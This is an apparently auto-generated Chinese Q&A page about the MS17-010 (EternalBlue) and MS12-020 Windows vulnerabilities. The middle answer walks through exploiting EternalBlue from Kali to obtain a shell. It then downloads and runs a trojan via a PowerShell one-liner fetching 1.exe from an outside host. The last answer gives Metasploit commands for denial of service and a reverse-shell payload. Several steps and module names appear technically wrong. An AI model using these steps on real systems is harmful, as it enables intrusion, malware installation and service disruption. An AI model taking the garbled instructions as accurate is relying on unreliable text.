ms17-010开启远程连接
时间: 2023-06-13 15:08:53 浏览: 151
MS17-010是Windows操作系统中的一个漏洞,也称为EternalBlue漏洞。该漏洞使得攻击者可以通过网络远程执行恶意代码,从而控制受感染的计算机。如果你想开启远程连接,可以使用远程桌面连接或其他远程控制软件,但是请注意,这样做会增加系统被攻击的风险。建议你在使用远程连接前,确保计算机已经安装了最新的安全补丁,并且使用强密码来保护远程连接。同时,也要注意保护个人信息和敏感数据,避免泄露。
相关问题
kali利用ms17-010挂马
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用该漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤:
1. 打开终端,输入以下命令更新kali系统:
```shell
sudo apt-get update
sudo apt-get upgrade
```
2. 下载ms17-010漏洞利用工具,可以从GitHub上下载:
```shell
git clone https://github.com/worawit/MS17-010.git
```
3. 进入MS17-010目录,运行以下命令编译漏洞利用工具:
```shell
cd MS17-010
make
```
4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞:
```shell
./send_and_execute 192.168.1.100 whoami.exe
```
5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell:
```shell
./eternalblue 192.168.1.100 shellcode.bin
```
6. 执行以下命令,连接目标主机的Shell:
```shell
nc 192.168.1.100 4444
```
7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序:
```shell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'"
```
需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。
msf之ms12-020的复现
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。
以下是利用MS12-020漏洞的步骤:
1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。
2. 打开Metasploit框架控制台,输入以下命令:
```
use auxiliary/scanner/rdp/ms12_020_check
```
这个命令将会检查目标是否存在MS12-020漏洞。
3. 如果目标存在漏洞,可以使用以下命令进行攻击:
```
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOSTS <target IP address>
exploit
```
这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。
4. 如果你想要执行更危险的攻击,可以使用以下命令:
```
use exploit/windows/rdp/ms12_020_maxchannelids
set RHOSTS <target IP address>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP address>
exploit
```
这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。
需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
阅读全文